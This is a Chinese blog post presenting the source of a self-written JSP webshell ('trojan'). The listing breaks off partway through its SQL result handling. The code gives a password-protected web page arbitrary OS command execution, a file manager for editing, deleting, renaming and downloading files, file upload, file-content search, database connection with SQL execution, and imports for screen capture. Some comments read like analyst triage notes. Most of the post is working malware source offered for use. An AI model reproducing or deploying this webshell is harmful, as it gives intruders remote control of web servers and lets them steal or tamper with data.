漂亮的JSP木马

纯粹手痒，写一个 JSP 木马。代码如下：

   1 <%@ page contentType="text/html; charset=utf-8"%>
   2 <%@ page import="java.io.*"%>
   3 <%@ page import="java.util.*"%>
   4 <%@ page import="java.nio.charset.Charset"%>
   5 <%@ page import="java.util.regex.*"%>
   6 <%@ page import="java.sql.*"%>
   7 <%@ page import="java.util.zip.ZipEntry"%>
   8 <%@ page import="java.util.zip.ZipOutputStream"%>
   9 <%@ page import="java.text.DecimalFormat"%>
  10 <%@ page import="java.net.InetAddress"%>
  11 <%@ page import="java.awt.Dimension"%>
  12 <%@ page import="java.awt.Toolkit"%>
  13 <%@ page import="java.awt.image.BufferedImage"%>
  14 <%@ page import="java.awt.Rectangle"%>
  15 <%@ page import="java.awt.Robot"%>
  16 <%@ page import="javax.imageio.ImageIO"%>
  17 <%!
  18     /*
  19      * Code by Kenn
  20      * QQ: 921506
  21      */
  22     private String myPassword = "hello"; // login password, stored in plaintext in the page source; where it is checked is outside this excerpt
  23     private String shellName = "Hello Shell"; //title shown on the page
  24     /*
  25     * skull sign: \u2620   star-and-crescent sign: \u262a   alien sign: \ud83d\udc7d
  26     */
  27     private String loginIcon = "\u2620"; // icon shown on the login page
  28     private int sessionOutTime = 30; //minutes; where the timeout is enforced is outside this excerpt
  29     private static String language = "ENG"; //default language: ENG or CHN; read by orChinese()
  30     private String encodeType = "utf8"; // charset name passed to new String(bytes, encodeType) in Unicode2GB()
  31     //welcome info of login page
  32     public static String welcomeMsg(){ // login-page greeting: registers the Chinese text in textMap, then resolves it according to `language`
  33         return orChinese("Welcome for coming","你丫又来了");
  34     }
  35
  36     private enum Operation{Edit,Delete,Rename,Download;} // per-file actions rendered as links by MyFile.setHtmlOperation(); the enum name is what ends up in the fsAction query parameter, which makes it a useful marker in access logs
  37     private String curPath; // not referenced anywhere else in this excerpt
  38     private boolean isDBconnected = false; // never updated in this excerpt (DBConnect() does not touch it)
  39     private Connection conn = null; // JDBC connection opened by DBConnect(); kept as page instance state
  40     private Statement dbStatement = null; // created from conn in DBConnect()
  41
  42     private static Map<String,String> textMap = null; // English -> Chinese UI strings, filled by initMap(); static, so shared by every request served by this page
  43
  44     static{
  45         initMap(); // build the translation table when the page's servlet class is loaded
  46     }
  47
  48     public static void initMap(){ // fills textMap once; later calls are no-ops because textMap is already non-null
  49         if (textMap==null){ // guard makes repeated calls (static block, or explicit) idempotent
  50             textMap = new HashMap<String,String>();
  51             textMap.put("Environment", "系统环境");
  52             textMap.put("File Manager", "文件管理");
  53             textMap.put("File Search", "文件搜索");
  54             textMap.put("Command", "命令行");
  55             textMap.put("Database", "数据库");
  56             textMap.put("Screen Capture", "屏幕采集");
  57             textMap.put("Logoff", "退出");
  58             textMap.put("OS", "操作系统");
  59             textMap.put("Computer Name", "计算机名");
  60             textMap.put("Available Processors", "处理器可用核心数");
  61             textMap.put("IP", "IP地址");
  62             textMap.put("System Driver", "系统盘符");
  63             textMap.put("Driver Info", "磁盘信息");
  64             textMap.put("User Name", "用户名");
  65             textMap.put("User DNS Domain", "用户域");
  66             textMap.put("User Domain", "帐户的域名称");
  67             textMap.put("User Profile", "用户目录");
  68             textMap.put("All User Profile", "用户公共目录");
  69             textMap.put("Temp", "用户临时文件目录");
  70             textMap.put("Program Files", "默认程序目录");
  71             textMap.put("AppData", "应用程序数据目录");
  72             textMap.put("System Root", "系统启动目录");
  73             textMap.put("Console", "控制台");
  74             textMap.put("File Executable", "可执行后缀");
  75             textMap.put("My Path", "本程序绝对路径");
  76             textMap.put("User Dir", "当前用户工作目录");
  77             textMap.put("Protocol", "网络协议");
  78             textMap.put("Server Info", "服务器软件版本信息");
  79             textMap.put("JDK Version", "JDK版本");
  80             textMap.put("JDK Home", "JDK安装路径");
  81             textMap.put("JVM Version", "JAVA虚拟机版本");
  82             textMap.put("JVM Name", "JAVA虚拟机名");
  83             textMap.put("Class Path", "JAVA类路径");
  84             textMap.put("Java Library Path", "JAVA载入库搜索路径");
  85             textMap.put("Java tmpdir", "JAVA临时目录");
  86             textMap.put("Compiler", "JIT编译器名");
  87             textMap.put("Java ext dirs", "扩展目录路径");
  88             textMap.put("Remote Addr", "客户机地址");
  89             textMap.put("Remote Host", "客户机器名");
  90             textMap.put("Remote User", "客户机用户名");
  91             textMap.put("Scheme", "请求方式");
  92             textMap.put("Secure", "应用安全套接字层");
  93             textMap.put("Yes", "是");
  94             textMap.put("No", "否");
  95             textMap.put("Edit", "编辑");
  96             textMap.put("Delete", "删除");
  97             textMap.put("Rename", "重命名");
  98             textMap.put("Download", "下载");
  99             textMap.put("File Name", "文件名");
 100             textMap.put("Size", "大小");
 101             textMap.put("Operation", "操作");
 102             textMap.put("GOTO", "跳转");
 103             textMap.put("Home", "家目录");
 104             textMap.put("Select", "选择");
 105             textMap.put("Upload", "上传");
 106             textMap.put("Create File", "创建文件");
 107             textMap.put("Create Folder", "创建文件夹");
 108             textMap.put("Wrong Password","密码错误");
 109             textMap.put("Folder name is null","文件夹名为空");
 110             textMap.put("Content is null","内容为空");
 111             textMap.put("File name is null","文件名为空");
 112             textMap.put("Search from","搜索目录");
 113             textMap.put("Search for file type","文件的后缀名");
 114             textMap.put("Setting","设置");
 115             textMap.put("Search by Name","按名称搜索");
 116             textMap.put("Search by Content","按内容搜索");
 117             textMap.put("Ignore Case","忽略大小写");
 118             textMap.put("Search keyword","关键词");
 119             textMap.put("Search","搜索");
 120             textMap.put("Execute","执行");
 121             textMap.put("Connect","连接");
 122             textMap.put("Disconnect","断开");
 123             textMap.put("Database Type","数据库类型");
 124             textMap.put("Driver","驱动程序");
 125             textMap.put("Host","主机地址");
 126             textMap.put("Port","端口号");
 127             textMap.put("DB Name","数据库名");
 128             textMap.put("Username","用户名");
 129             textMap.put("Password","密码");
 130             textMap.put("SQL","SQL语句");
 131             textMap.put("File is already exist","文件已存在");
 132             textMap.put("Folder is empty","文件夹为空");
 133             textMap.put("Bad command","错误的命令");
 134             textMap.put("Save","保存");
 135             textMap.put("Return Back","返回");
 136             textMap.put("is not a text file","不是文本文件");
 137             textMap.put("File can not be writed","文件不可写");
 138             textMap.put("Save success","保存成功");
 139             textMap.put("Exception","异常");
 140             textMap.put("Folder already exist","文件夹已存在");
 141             textMap.put("File already exist","文件已存在");
 142             textMap.put("File upload success","文件上传成功");
 143             textMap.put("File upload failed","文件上传失败");
 144             textMap.put("connect failed","连接失败");
 145             textMap.put("connect success","连接成功");
 146             textMap.put("Can not connect to database","不能连接到数据库");
 147             textMap.put("Invalid SQL","无效的SQL");
 148             textMap.put("result","结果");
 149             textMap.put("SQL execute failed","SQL执行失败");
 150             textMap.put("SQL execute success","SQL执行成功");
 151             textMap.put("Free, Total","可用,共");
 152             textMap.put("Please input new name","请输入新的名字");
 153             textMap.put("Name can not be null","名字不可为空");
 154             textMap.put("Refresh","刷新");
 155         }
 156     }
 157     public static String orChinese(String key){ // Chinese text for key when language is "CHN", otherwise key itself; in CHN mode a key absent from textMap yields null
 158         return "CHN".equalsIgnoreCase(language)
 159                 ? textMap.get(key)
 160                 : key;
 161     }
 162     public static String orChinese(String english, String chinese){ // registers (or overwrites) the translation in the shared static textMap on every call, then resolves it
 163         textMap.put(english, chinese);
 164         return orChinese(english);
 165     }
 166     public List<File> getFolderList(String path) { // immediate sub-directories of path; empty list when path is missing or not a directory
 167         List<File> rtnList = new ArrayList<File>();
 168         File file = new File(path);
 169         if (file.exists() && file.isDirectory()) {
 170             File[] listFiles = file.listFiles(new FileFilter() { // listFiles() returns null on an I/O error; that case is not handled here
 171                 public boolean accept(File pathname) {
 172                     return pathname.isDirectory();
 173                 }
 174             });
 175             rtnList.addAll(Arrays.asList(listFiles));
 176         }
 177         return rtnList;
 178     }
 179
 180     public List<File> getFileList(String path) { // regular files directly under path; empty list when path is missing or not a directory
 181         List<File> rtnList = new ArrayList<File>();
 182         File file = new File(path);
 183         if (file.exists() && file.isDirectory()) {
 184             File[] listFiles = file.listFiles(new FileFilter() { // listFiles() returns null on an I/O error; that case is not handled here
 185                 public boolean accept(File pathname) {
 186                     return pathname.isFile();
 187                 }
 188             });
 189             rtnList.addAll(Arrays.asList(listFiles));
 190         }
 191         return rtnList;
 192     }
 193
 194     public class MyFile extends File { // a File plus the HTML action links for one row of the directory listing; non-static inner class, so every instance holds a reference to the page object
 195
 196         private String htmlOperation; // rendered anchors, built by setHtmlOperation(); null until then
 197         private String requestUrl; // base URL that the per-file action links are appended to
 198
 199         public MyFile(String pathname, String requestUrl) {
 200             super(pathname);
 201             this.requestUrl = requestUrl;
 202         }
 203
 204         public String getHtmlOperation() { // HTML produced by the last setHtmlOperation() call
 205             return htmlOperation;
 206         }
 207
 208         public void setHtmlOperation(Operation... Opers) { // one anchor per operation, each carrying "&fsAction=<op>&fileName=<name>"; getName() is written into the markup as-is
 209             this.htmlOperation = "";
 210             for (Operation o : Opers) {
 211                 if (o.equals(Operation.Rename)) { // Rename goes through the page's JavaScript rename() prompt instead of a plain link
 212                     String url = requestUrl + "&fsAction=" + o + "&fileName=" + this.getName();
 213                     htmlOperation += "&nbsp;<a href=\"#\" onclick=\"rename(‘" + url + "‘,‘"
 214                             + orChinese("Please input new name") + "‘,‘" + orChinese("Name can not be null") + "‘)\">"
 215                             + orChinese(o.toString()) + "</a>&nbsp;";
 216                 } else {
 217                     htmlOperation += "&nbsp;<a href=\"" + requestUrl + "&fsAction=" + o + "&fileName=" + this.getName()
 218                             + "\">" + orChinese(o.toString()) + "</a>&nbsp;";
 219                 }
 220             }
 221         }
 222
 223         public String getLength() { // "" for directories, otherwise the human-readable size from getSize()
 224             if (this.isDirectory())
 225                 return "";
 226             return getSize(this.length());
 227         }
 228     }
 229
 230     public static String getSize(long size) { // formats a byte count as B/KB/MB/GB/TB with two decimals; the unit is picked by right-shifting size
 231         DecimalFormat df = new DecimalFormat("0.00");
 232         if (size >> 40 >= 1)
 233             return df.format((float) size / 1024 / 1024 / 1024 / 1024) + " TB"; // size is widened to float, so values above 2^24 bytes lose precision before the division
 234         if (size >> 30 >= 1)
 235             return df.format((float) size / 1024 / 1024 / 1024) + " GB";
 236         else if (size >> 20 >= 1)
 237             return df.format((float) size / 1024 / 1024) + " MB";
 238         else if (size >> 10 >= 1)
 239             return df.format((float) size / 1024) + " KB";
 240         else
 241             return df.format((float) size) + " B "; // note the trailing space in the byte unit
 242     }
 243
 244     public void download(String path, HttpServletResponse response) throws Exception { // streams the file at path to the client as an attachment; any IOException is rethrown unchanged
 245         try {
 246             File file = new File(path);
 247             String filename = file.getName();
 248             String ext = filename.substring(filename.lastIndexOf(".") + 1).toUpperCase(); // computed but not used
 249             InputStream fis = new BufferedInputStream(new FileInputStream(path));
 250             byte[] buffer = new byte[fis.available()]; // buffer is sized from available(), an estimate rather than the file length
 251             fis.read(buffer); // single read; the count actually read is not checked
 252             fis.close();
 253             response.reset(); // discards any page output already buffered before the binary body
 254             response.addHeader("Content-Disposition",
 255                     "attachment;filename=" + new String(filename.getBytes(), "ISO-8859-1")); // re-labels the name's default-charset bytes as Latin-1 for the header
 256             response.addHeader("Content-Length", "" + file.length());
 257             OutputStream toClient = new BufferedOutputStream(response.getOutputStream());
 258             response.setContentType("application/octet-stream");
 259             toClient.write(buffer);
 260             toClient.flush();
 261             toClient.close();
 262         } catch (IOException ex) {
 263             throw ex; // no handling here; the caller (download(String, String, String, HttpServletResponse)) turns it into a message
 264         }
 265     }
 266
 267     public static File createZip(String sourcePath, String zipPath) throws Exception { // zips the directory at sourcePath into a new file at zipPath; refuses an existing zipPath and a missing or empty source folder
 268         FileOutputStream fos = null;
 269         ZipOutputStream zos = null;
 270         try {
 271             File zipFile = new File(zipPath);
 272             if (zipFile.exists()) {
 273                 throw new Exception(orChinese("File is already exist") + ": " + zipFile.getName());
 274             }
 275             File srcFolder = new File(sourcePath);
 276             if (!srcFolder.exists() || srcFolder.listFiles().length == 0) { // listFiles() is null for a plain file or on I/O error, which surfaces here as a NullPointerException
 277                 throw new Exception(orChinese("Folder is empty") + ": " + srcFolder.getName());
 278             }
 279             fos = new FileOutputStream(zipPath);
 280             zos = new ZipOutputStream(fos);
 281             writeZip(new File(sourcePath), "", zos); // entries are added relative to the source folder's own name
 282             return zipFile;
 283         } catch (Exception e) {
 284             throw e; // rethrown unchanged
 285         } finally {
 286             try {
 287                 if (zos != null)
 288                     zos.close();
 289                 if (fos != null)
 290                     fos.close();
 291             } catch (Exception e) {
 292                 throw e; // a close failure also propagates, replacing any exception from the try block
 293             }
 294         }
 295     }
 296
 297     private static void writeZip(File file, String parentPath, ZipOutputStream zos) throws Exception { // recursively adds file entries below parentPath; directories get no entry of their own, only their contents
 298         if (!file.exists())
 299             return;
 300         if (file.isDirectory()) {
 301             parentPath += file.getName() + File.separator; // entry names use the platform separator
 302             File[] files = file.listFiles();
 303             for (File f : files) {
 304                 writeZip(f, parentPath, zos);
 305             }
 306         } else {
 307             FileInputStream fis = null;
 308             DataInputStream dis = null;
 309             try {
 310                 fis = new FileInputStream(file);
 311                 dis = new DataInputStream(new BufferedInputStream(fis)); // wrapped but never read from; the loop below reads fis directly
 312                 ZipEntry ze = new ZipEntry(parentPath + file.getName());
 313                 zos.putNextEntry(ze);
 314                 byte[] content = new byte[1024];
 315                 int len;
 316                 while ((len = fis.read(content)) != -1) {
 317                     zos.write(content, 0, len);
 318                     zos.flush(); // flushed after every 1 KiB chunk
 319                 }
 320             } catch (Exception e) {
 321                 throw e; // rethrown unchanged
 322             } finally {
 323                 try {
 324                     if (dis != null)
 325                         dis.close();
 326                     if (fis != null)
 327                         fis.close();
 328                 } catch (Exception e) {
 329                     throw e;
 330                 }
 331             }
 332         }
 333     }
 334
 335     public String exeCmd(String cmd) { // runs cmd via Runtime.exec(String) and returns its standard output as HTML; this is the page's command-execution primitive and the call to look for when triaging this sample
 336         Runtime runtime = Runtime.getRuntime();
 337         Process proc = null;
 338         String retStr = "";
 339         InputStreamReader insReader = null;
 340         char[] tmpBuffer = new char[1024];
 341         int nRet = 0;
 342
 343         try {
 344             proc = runtime.exec(cmd); // single-string form: the JVM splits cmd on whitespace
 345             insReader = new InputStreamReader(proc.getInputStream(), Charset.forName("GB2312")); // process stdout, decoded as GB2312
 346
 347             while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {
 348                 retStr += new String(tmpBuffer, 0, nRet) + "\n"; // a "\n" is appended after every read chunk, not after every output line
 349             }
 350             insReader.close();
 351             retStr = HTMLEncode(retStr);
 352             return retStr;
 353         } catch (Exception e) {
 354             retStr = "<font color=\"red\">" + orChinese("Bad command") + ": \"" + cmd + "\"</font>"; // every failure is reported as a bad command; cmd is echoed back without HTMLEncode
 355             return retStr;
 356         }
 357     }
 358
 359     public String HTMLEncode(String str) { // minimal escaping for display: only space, "<", ">" and CRLF are rewritten; "&" and quotes pass through, and a bare "\n" is not turned into <br>
 360         str = str.replaceAll(" ", "&nbsp;");
 361         str = str.replaceAll("<", "&lt;");
 362         str = str.replaceAll(">", "&gt;");
 363         str = str.replaceAll("\r\n", "<br>");
 364         return str;
 365     }
 366
 367     public String Unicode2GB(String str) { // re-decodes a string that was read as ISO-8859-1 using encodeType; "" for null, the input unchanged if the conversion throws
 368         String sRet = null;
 369         if (str == null)
 370             return "";
 371         try {
 372             sRet = new String(str.getBytes("ISO8859_1"), encodeType);
 373         } catch (Exception e) {
 374             sRet = str; // e.g. an unsupported encodeType
 375         }
 376
 377         return sRet;
 378     }
 379
 380     public String pathConvert(String path) { // normalizes backslashes to "/" and adds a trailing "/" when path is an existing directory or has no parent (a root or drive)
 381         String sRet = path.replace(‘\\‘, ‘/‘);
 382         File file = new File(path);
 383         if (file.getParent() != null) {
 384             if (file.isDirectory()) { // a plain file, or a path that does not exist, keeps no trailing slash
 385                 if (!sRet.endsWith("/"))
 386                     sRet += "/";
 387             }
 388         } else {
 389             if (!sRet.endsWith("/"))
 390                 sRet += "/";
 391         }
 392         return sRet;
 393     }
 394
 395     public String searchFile(String path, String content, String subfix, boolean byname, boolean ignoreCase) { // runs the recursive search and renders one absolute path per line, separated by <br>, with backslashes normalized to "/"
 396         List<String> list = new ArrayList<String>();
 397         searchFile(list, path, content, subfix, byname, ignoreCase);
 398         StringBuilder sb = new StringBuilder();
 399         for (String line : list) {
 400             sb.append(line.replace("\\", "/") + "<br>");
 401         }
 402         return sb.toString();
 403     }
 404
 405     private void searchFile(List<String> list, String path, String content, String subfix, boolean byname, // depth-first search below path: a file matches when its name ends with one of the space-separated suffixes and either its name (byname) or its GB2312 text (readText) contains content
 406             boolean ignoreCase) {
 407         path = pathConvert(path);
 408         File dir = new File(path);
 409         if (dir.exists() && dir.isDirectory()) {
 410             if (dir.list() != null && dir.list().length > 0) { // list() is evaluated twice
 411                 for (File f : dir.listFiles()) {
 412                     if (!f.isDirectory()) {
 413                         String fname = f.getName();
 414                         String srcStr = f.getName();
 415                         if (containsSubfix(fname, subfix.split(" "))) {
 416                             if (!byname) {
 417                                 srcStr = readText(f); // whole file loaded into memory for a content search
 418                             }
 419                             if (ignoreCase) {
 420                                 content = content.toUpperCase(); // the parameter itself is overwritten, so later files and the recursive calls see the upper-cased needle
 421                                 srcStr = srcStr.toUpperCase();
 422                             }
 423                             if (srcStr.contains(content)) {
 424                                 list.add(f.getAbsolutePath());
 425                             }
 426                         }
 427                     } else {
 428                         searchFile(list, f.getAbsolutePath(), content, subfix, byname, ignoreCase);
 429                     }
 430                 }
 431             }
 432         }
 433     }
 434
 435     private boolean containsSubfix(String name, String[] subfixs) { // true when name ends (case-insensitively) with any entry of subfixs; false for a null or empty array; every entry is checked rather than stopping at the first hit
 436         boolean rtn = false;
 437         if (subfixs == null || subfixs.length == 0)
 438             return rtn;
 439         for (String ext : subfixs) {
 440             if (name.toUpperCase().endsWith(ext.toUpperCase())) {
 441                 rtn = true;
 442             }
 443         }
 444         return rtn;
 445     }
 446
 447     public static String readText(File file) { // reads the whole file as GB2312 and joins its lines with no separator; errors go to printStackTrace(), i.e. wherever the container routes System.err
 448         StringBuilder sb = new StringBuilder();
 449         BufferedReader reader = null;
 450         try {
 451             reader = new BufferedReader(new InputStreamReader(new FileInputStream(file), "GB2312"));
 452             String str = null;
 453             while ((str = reader.readLine()) != null) {
 454                 sb.append(str); // line terminators are dropped
 455             }
 456         } catch (Exception e) {
 457             e.printStackTrace();
 458         } finally {
 459             try {
 460                 reader.close(); // reader is still null if the file could not be opened, so this throws and is printed as well
 461             } catch (Exception e) {
 462                 e.printStackTrace();
 463             }
 464         }
 465         return sb.toString();
 466
 467     }
 468
 469     public String openFile(String path, String fileName, String curUri) { // renders an edit form (textarea plus Save) for fileName under path; on IOException returns a red "is not a text file" message instead
 470         String sRet = "";
 471         String fileString = null;
 472         File curFile = null;
 473         path = pathConvert(path);
 474         try {
 475             fileString = "";
 476             curFile = new File(path, fileName);
 477             FileReader fileReader = new FileReader(curFile); // decoded with the JVM default charset
 478             char[] chBuffer = new char[1024];
 479             int nRet;
 480             while ((nRet = fileReader.read(chBuffer, 0, 1024)) != -1) {
 481                 fileString += new String(chBuffer, 0, nRet);
 482             }
 483             if (fileString != null) { // always true here: fileString was set to "" above
 484                 sRet += "<table align=\"center\" width=\"100%\" cellpadding=\"2\" cellspacing=\"1\">\n";
 485                 sRet += "    <form name=\"openfile\" method=\"post\" action=\"" + curUri + "&curPath=" + path
 486                         + "&fsAction=save" + "\">\n"; // the form posts back to fsAction=save, handled by saveFile()
 487                 sRet += "    <input type=\"hidden\" name=\"fileName\" value=\"" + fileName + "\" />\n"; // fileName is written into the attribute as-is
 488                 sRet += "    <tr>\n";
 489                 sRet += "        <td>[<a href=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\">"
 490                         + orChinese("Return Back") + "</a>]</td>\n";
 491                 sRet += "    </tr>\n";
 492                 sRet += "    <tr>\n";
 493                 sRet += "        <td align=\"left\">\n";
 494                 sRet += "            <textarea name=\"fileContent\" class=\"trans\" style=\"display:block;width:100%\" rows=\"32\" >\n";
 495                 sRet += HTMLEncode(fileString).replace("<br>", "\r\n"); // escape, then undo the <br> so the textarea keeps the original line breaks
 496                 sRet += "            </textarea>\n";
 497                 sRet += "        </td>\n";
 498                 sRet += "    </tr>\n";
 499                 sRet += "    <tr>\n";
 500                 sRet += "        <td align=\"center\"><input type=\"submit\" class=\"trans\" value=\""
 501                         + orChinese("Save") + "\" /></td>\n";
 502                 sRet += "    </tr>\n";
 503                 sRet += "    </form>\n";
 504                 sRet += "</table>\n";
 505             }
 506             fileReader.close(); // not reached when the read loop throws
 507         } catch (IOException e) {
 508             sRet = "<font color=\"red\">\"" + path + "\" " + orChinese("is not a text file") + "</font>";
 509         }
 510         return sRet;
 511     }
 512
 513     public String saveFile(String path, String fileName, String curUri, String fileContent) { // overwrites fileName under path with fileContent when the file exists and is writable, then redirects back to the listing with a meta refresh
 514         String sRet = "";
 515         File file = null;
 516
 517         path = pathConvert(path);
 518
 519         try {
 520             file = new File(path, fileName);
 521
 522             if (!file.canWrite()) { // canWrite() is also false for a file that does not exist yet
 523                 sRet = "<font color=\"red\">" + orChinese("File can not be writed") + "</font>";
 524             } else {
 525                 FileWriter fileWriter = new FileWriter(file); // truncates the file; JVM default charset
 526                 fileWriter.write(fileContent);
 527
 528                 fileWriter.close();
 529                 sRet = orChinese("Save success") + "!\n";
 530                 sRet += "<meta http-equiv=\"refresh\" content=\"1;url=" + curUri + "&curPath=" + path
 531                         + "&fsAction=list\" />\n";
 532             }
 533         } catch (IOException e) {
 534             sRet = "<font color=\"red\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>"; // the JDK message (which includes the path) is shown to the client
 535         }
 536         return sRet;
 537     }
 538
 539     public String createFolder(String path, String fileName, String url) { // mkdirs() for fileName under path unless it already exists, then a meta refresh back to the listing; the boolean result of mkdirs() is ignored
 540         try {
 541             File file = new File(path, fileName);
 542             if (file.exists())
 543                 return orChinese("Folder already exist") + "!";
 544             else
 545                 file.mkdirs(); // creates missing parents too
 546         } catch (Exception e) {
 547             return "<font color=\"red\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
 548         }
 549         return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
 550     }
 551
 552     public String createFile(String path, String fileName, String url) { // createNewFile() for fileName under path unless it already exists, then a meta refresh back to the listing; the boolean result is ignored
 553         try {
 554             File file = new File(path, fileName);
 555             if (file.exists())
 556                 return orChinese("File already exist") + "!";
 557             else
 558                 file.createNewFile(); // empty file; throws IOException if the parent directory is missing
 559         } catch (Exception e) {
 560             return "<font color=\"red\">" + orChinese("Exception") + ": " + e.getMessage() + "</font>";
 561         }
 562         return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
 563     }
 564
 565     public String deleteFile(String path, String fileName, String url) { // File.delete() on fileName under path if it exists, result ignored; a non-empty directory is left in place because delete() only removes empty ones
 566         File file = new File(path, fileName);
 567         if (file.exists())
 568             file.delete();
 569         return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
 570     }
 571
 572     public String download(String path, String fileName, String url, HttpServletResponse response) { // file-manager entry point: a directory is first zipped to "<dir>.zip" beside it, then streamed by download(String, HttpServletResponse); returns null when the target is missing, "" on success, or the exception message
 573         String rtnStr = "";
 574         File file = new File(path, fileName);
 575         File downFile = null; // unused, as is the url parameter
 576         if (!file.exists())
 577             return null;
 578         try {
 579             if (file.isDirectory()) {
 580                 file = createZip(file.getAbsolutePath(), file.getAbsolutePath() + ".zip"); // the archive is never deleted afterwards, so it stays on disk next to the directory - a forensic artifact worth looking for on a host where this page was served
 581             }
 582             download(file.getAbsolutePath(), response);
 583         } catch (Exception e) {
 584             rtnStr = e.getMessage(); // e.g. the "File is already exist" message from createZip() on a second download of the same directory
 585         }
 586         return rtnStr;
 587     }
 588
 589     public String rename(String path, String fileName, String newFile, String url) { // renameTo() within the same directory if the source exists; its boolean result is ignored, then a meta refresh back to the listing
 590         File file = new File(path, fileName);
 591         File nFile = new File(path, newFile);
 592         if (file.exists()) {
 593             file.renameTo(nFile);
 594         }
 595         return "<meta http-equiv=\"refresh\" content=\"0;url=" + url + "&curPath=" + path + "&fsAction=list\" />";
 596     }
 597
 598     public String uploadFile(ServletRequest request, String path, String curUri) { // hand-rolled multipart/form-data parser: the whole body is read into memory, the first line is taken as the boundary, the filename is cut out of the part header, and the bytes between the header and the closing boundary are written to path + filename
 599         String sRet = "";
 600         File file = null;
 601         InputStream in = null;
 602         path = pathConvert(path);
 603         try {
 604             in = request.getInputStream();
 605             byte[] inBytes = new byte[request.getContentLength()]; // sized from the Content-Length header
 606             int nBytes;
 607             int start = 0;
 608             int end = 0;
 609             int size = 1024;
 610             String token = null;
 611             String filePath = null;
 612             while ((nBytes = in.read(inBytes, start, size)) != -1) { // fills the array 1 KiB at a time
 613                 start += nBytes;
 614             }
 615             in.close();
 616             int i = 0;
 617             byte[] seperator;
 618
 619             while (inBytes[i] != 13) { // the boundary line runs up to the first CR
 620                 i++;
 621             }
 622             seperator = new byte[i];
 623
 624             for (i = 0; i < seperator.length; i++) {
 625                 seperator[i] = inBytes[i];
 626             }
 627             String dataHeader = null;
 628             i += 3;
 629             start = i;
 630             while (!(inBytes[i] == 13 && inBytes[i + 2] == 13)) { // part header ends at the blank line (CR LF CR LF)
 631                 i++;
 632             }
 633             end = i - 1;
 634             dataHeader = new String(inBytes, start, end - start + 1); // decoded with the JVM default charset
 635             token = "filename=\"";
 636             start = dataHeader.indexOf(token) + token.length();
 637             token = "\"";
 638             end = dataHeader.indexOf(token, start) - 1;
 639             filePath = dataHeader.substring(start, end + 1); // the filename exactly as the client sent it
 640             i += 4;
 641             start = i;
 642             end = inBytes.length - 1 - 2 - seperator.length - 2 - 2; // drops the trailing CRLF, "--", boundary, "--", CRLF
 643             File newFile = new File(path + filePath); // client-supplied name appended to path without normalization
 644             newFile.createNewFile();
 645             FileOutputStream out = new FileOutputStream(newFile);
 646             out.write(inBytes, start, end - start + 1);
 647             out.close();
 648
 649             sRet = "<script language=\"javascript\">\n";
 650             sRet += "alert(\"" + orChinese("File upload success") + "! " + filePath + "\");\n";
 651             sRet += "</script>\n";
 652         } catch (IOException e) { // only IOException is reported; an index error from a malformed body propagates out of this method
 653             sRet = "<script language=\"javascript\">\n";
 654             sRet += "alert(\"" + orChinese("File upload failed") + "!\");\n";
 655             sRet += "</script>\n";
 656         }
 657
 658         sRet += "<meta http-equiv=\"refresh\" content=\"0;url=" + curUri + "&curPath=" + path + "\" />";
 659         return sRet;
 660     }
 661
 662     public String DBConnect(String url, String username, String password) { // opens a JDBC connection through DriverManager (credentials only when username is non-blank) and keeps conn/dbStatement as page state; returns a status string carrying the driver's message on failure. No driver class is loaded here, and isDBconnected is not updated
 663         String bRet = orChinese("connect failed");
 664         if (url != null) {
 665             try {
 666                 if (username != null && username.trim().length() > 0) {
 667                     conn = DriverManager.getConnection(url, username, password);
 668                 } else {
 669                     conn = DriverManager.getConnection(url); // credentials, if any, must then be part of the URL
 670                 }
 671                 dbStatement = conn.createStatement(); // a previous connection is simply dropped, not closed
 672                 bRet = orChinese("connect success");
 673             } catch (SQLException e) {
 674                 bRet = orChinese("connect failed") + ": " + e.getMessage();
 675             }
 676         }
 677         return bRet;
 678     }
 679
 680     public String DBExecute(String sql) {
 681         String sRet = "";
 682         if (sql == null)
 683             return "SQL is null";
 684         if (conn == null || dbStatement == null) {
 685             sRet = "<font color=\"red\">" + orChinese("Can not connect to database") + "</font>";
 686         } else {
 687             try {
 688                 if (sql.length() <= 6)
 689                     return "<font color=\"red\">" + orChinese("Invalid SQL") + "</font>";
 690                 if (sql.toLowerCase().substring(0, 6).equals("select")) {
 691                     ResultSet rs = dbStatement.executeQuery(sql);
 692                     ResultSetMetaData rsmd = rs.getMetaData();
 693                     int colNum = rsmd.getColumnCount();
 694                     int colType;
 695
 696                     sRet = orChinese("SQL execute success") + ", " + orChinese("result") + ":<br>\n";
 697                     sRet += "<table align=\"center\" border=\"0\" cellpadding=\"2\" cellspacing=\"1\">\n";
 698                     sRet += "    <tr>\n";
 699                     for (int i = 1; i <= colNum; i++) {
 700                         sRet += "        <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\n";
 701                     }
 702                     sRet += "    </tr>\n";
 703                     while (rs.next()) {
 704                         sRet += "    <tr>\n";
 705                         for (int i = 1; i <= colNum; i++) {
 706                             colType = rsmd.getColumnType(i);
 707
 708                             sRet += "        <td>";
 709                             switch (colType) {
 710                             case Types.BIGINT:
 711                                 sRet += rs.getLong(i);
 712                                 break;
 713
 714                             case Types.BIT:
 715                                 sRet += rs.getBoolean(i);
 716                                 break;
 717
 718                             case Types.BOOLEAN:
 719                                 sRet += rs.getBoolean(i);
 720                                 break;
 721
 722                             case Types.CHAR:
 723                                 sRet += rs.getString(i);
 724                                 break;
 725
 726                             case Types.DATE:
 727                                 sRet += rs.getDate(i).toString();
 728                                 break;
 729
 730                             case Types.DECIMAL:
 731                                 sRet += rs.getDouble(i);
 732                                 break;
 733
 734                             case Types.NUMERIC:
 735                                 sRet += rs.getDouble(i);
 736                                 break;
 737
 738                             case Types.REAL:
 739                                 sRet += rs.getDouble(i);
 740                                 break;
 741
 742                             case Types.DOUBLE:
 743                                 sRet += rs.getDouble(i);
 744                                 break;
 745
 746                             case Types.FLOAT:
 747                                 sRet += rs.getFloat(i);
 748                                 break;
 749
 750                             case Types.INTEGER:
 751                                 sRet += rs.getInt(i);
 752                                 break;
 753
 754                             case Types.TINYINT:
 755                                 sRet += rs.getShort(i);
 756                                 break;
 757
 758                             case Types.VARCHAR:
